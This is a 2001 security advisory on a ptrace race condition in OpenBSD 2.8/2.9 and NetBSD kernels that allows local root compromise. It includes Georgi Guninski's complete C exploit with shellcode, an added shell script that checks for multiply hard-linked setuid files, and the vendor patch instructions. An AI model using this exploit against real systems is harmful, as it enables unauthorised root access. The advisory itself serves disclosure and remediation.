20th Jul 2001 [SBWID-144]
COMMAND
	    kernel
SYSTEMS AFFECTED
	    OpenBSD 2.9, 2.8, NetBSD
PROBLEM
	    The following is based on Georgi  Guninski security advisory  #47.
	    There is a local root compromise in OpenBSD 2.9 and 2.8 due  to a
	    race, probably in the kernel.   It is quite similar to the  Linux
	    kernel ptrace race of several months ago.
	    By forking a few processes it is possible to attach to a +s (set-
	    uid) process with ptrace.  The process seems to be in  a  strange
	    state when it is attached.  Contrary to the man page,  PT_DETACH
	    allows specifying an address at which execution continues.
	    Exploit:
	
	    /* Written by Georgi Guninski http://www.guninski.com
	       Tested on OpenBSD 2.9 and 2.8
	       Works best after reboot - the +s program must not be executed before, seems
	       executes /tmp/sh
	       /tmp/su must be a link to a +s program
	       if the +s program has been executed, create and run a shell script the size of RAM
	       You may need to type "fg" if the program receives a stop signal
	       you may need to run the program several times
	    */
	    #include <stdio.h>
	    #include <fcntl.h>
	    #include <unistd.h>      /* fork, getpid, execle, sleep */
	    #include <sys/types.h>
	    #include <signal.h>
	    #include <sys/ptrace.h>
	    #include <sys/wait.h>
	    #include <limits.h>
	    #include <errno.h>
	    #include <stdlib.h>
	    #include <machine/reg.h>
	
	    int me = 0;
	
	    void endit(int x)
	    {
	        if (!me) {
	            printf("exiting\n");
	            exit(0);
	        }
	    }
	
	    extern char **environ;
	
	    int main(int ac, char **av)
	    {
	        volatile struct reg pt;
	        // exec "/tmp/sh"
	        char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
	                          "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
	                          "\xb0\x3b\x50\xcd\x80\x90\x90\x90";
	        int j, status, sig;
	        volatile int done = 0;
	        volatile static int done2 = 0;
	        int pid, pid2, i;
	        int num;    // number of processes to fork. 20 works for me on Pentium500
	        int target;
	        char *env1;
	        // address of $joro where execution of shell code begins. may need to be changed
	        unsigned int breakat = 0xdfbfddaf;
	
	        num = 20;
	        pid = getpid();
	        if (!getenv("joro")) {
	            setenv("joro", bsdshell, 1);
	            if (execle(av[0], "a", NULL, environ))
	                perror("exec");
	        } else
	            breakat = (unsigned int)getenv("joro");
	        printf("Written by Georgi Guninski\nShall jump to %x\n", breakat);
	        target = pid;
	        printf("Started pid1=%d target=%d\n", pid, target);
	        for (i = 0; i < num; i++) {
	            if (!done)
	                if (!(pid2 = fork())) {
	                    signal(SIGURG, &endit);
	                    pid2 = getpid();
	                    while (!done) {
	                        if (!ptrace(PT_ATTACH, target, NULL, NULL)) {
	                            done = 1;
	                            printf("\nAttached!\n");
	                            wait(&status);
	                            sig = WSTOPSIG(status);
	                            printf("sig=%d %s\n", sig, sys_siglist[sig]);
	                            ptrace(PT_GETREGS, target, (caddr_t)&pt, NULL);
	                            printf("eip=%x esp=%x\n", pt.r_eip, pt.r_esp);
	                            me = 1;
	                            done2 += 1;
	                            ptrace(PT_DETACH, target, (caddr_t)breakat, NULL);
	                            //sleep(2);
	                            kill(0, SIGURG);
	                            sleep(4);
	                            while (42)
	                                kill(target, SIGCONT);
	                        }
	                    }
	                }
	        }
	        // "/tmp/su" must be a symbolic link to a +s program.
	        // the program must not be executed before.
	        execle("/tmp/su", "/usr/bin/su", NULL, environ);
	    }
	
	    In testing out the recent OpenBSD exploit by Georgi Guninski, James
	    Babiak has found that my OpenBSD 2.8 box was not vulnerable.    He
	    has come to the conclusion that  boxes with the stephanie  kernel
	    patches by Mike Schiffman and doe are not vulnerable to this  ex-
	    ploit, at least  without modifying the  exploit itself.  The ste-
	    phanie patches do not have hard link restrictions.  However,   on
	    the tested box /tmp is its own partition (duh), therefore not al-
	    lowing you to do a cross-device link.
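	    As an added defender-side check (not part of the advisory or  of
	    Guninski's exploit), the POSIX shell functions below report  set-
	    uid/setgid executables that carry more than one hard link,  which
	    is how a linked copy of a +s program such as the /tmp/su above
	    would show up, and tell whether a path like /tmp is its own mount
	    point, the condition that blocked the cross-device  link  on  the
	    tested box.  Assumes only POSIX find, df -P and awk.

```sh
#!/bin/sh
# Added check, not from the advisory: looks for the two conditions discussed
# above, a +s executable with extra hard links and whether /tmp is its own
# filesystem. Uses only POSIX find, df -P and awk.

# Print every setuid or setgid regular file under the given directories
# (default: /) that has more than one hard link. Both paths of a linked
# pair are printed, so one linked copy shows up as two lines.
suid_multilink() {
    [ $# -eq 0 ] && set -- /
    find "$@" -type f \( -perm -4000 -o -perm -2000 \) -links +1 2>/dev/null
}

# Print the mount point holding PATH: 6th column of the 2nd line of df -P.
mount_point_of() {
    df -P "$1" | awk 'NR == 2 { print $6 }'
}

# Exit 0 when PATH is itself a mount point, i.e. its own filesystem, so a
# hard link from another filesystem into it cannot be created.
is_own_fs() {
    [ "$(mount_point_of "$1")" = "$1" ]
}

# Human-readable report; pass directories to limit the scan, none for /.
report() {
    if is_own_fs /tmp; then
        echo "/tmp is its own filesystem: cross-device links into it fail"
    else
        echo "/tmp shares a filesystem with $(mount_point_of /tmp): hard links to +s programs are possible"
    fi
    echo "setuid/setgid files with more than one hard link:"
    suid_multilink "$@"
}

# Run only when invoked as: sh check.sh --run [dir ...]
if [ "${1:-}" = "--run" ]; then
    shift
    report "$@"
fi
```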
SOLUTION
	    It has been fixed; the patch is available:
	
	        ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.8/common/030_kernexc.patch
	        ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/007_kernexec.patch
	
	    The  fix  has  also  been  committed  to  the  2.8  and 2.9 stable
	    branches.
	    For NetBSD, kernel sources must be updated and a new kernel built
	    and installed.  The instructions for updating your kernel sources
	    depend upon which particular NetBSD release you are running.
	    Systems running NetBSD-current dated from before 2001-06-15 should
	    be  upgraded  to  NetBSD-current  dated  2001-06-15 or later.  The
	    following  source  directories  need   to  be  updated  from   the
	    netbsd-current CVS branch (aka HEAD):
	
	        src/sys/compat/netbsd32
	        src/sys/kern
	
	    Alternatively, apply  the following  patch (with  potential offset
	    differences):
	
	        ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2001-009-ptrace-1.5.patch
	
	    Systems running NetBSD 1.5 dated from before 2001-06-17 should  be
	    upgraded from NetBSD 1.5 sources  dated 2001-06-17 or later.   The
	    following  source  directories  need   to  be  updated  from   the
	    netbsd-1-5 CVS branch:
	
	        src/sys/compat/netbsd32
	        src/sys/kern
	
	    Alternatively, apply  the following  patch (with  potential offset
	    differences):
	
	        ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2001-009-ptrace-1.5.patch
	
	    NetBSD 1.5.1 is not vulnerable.
	    It is believed the 1.4 versions are vulnerable to this issue,  but
	    a  working  exploit  could  not  be  produced.   The  following is
	    recommended action for  1.4 systems.   Systems running NetBSD  1.4
	    dated from before  2001-07-19 should be  upgraded from NetBSD  1.4
	    sources dated 2001-07-19 or later.  The following source directory
	    needs to be updated from the netbsd-1-4 CVS branch:
	
	        src/sys/kern
	
	    Alternatively, apply  the following  patch (with  potential offset
	    differences):
	
	        ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2001-009-ptrace-1.4.patch
	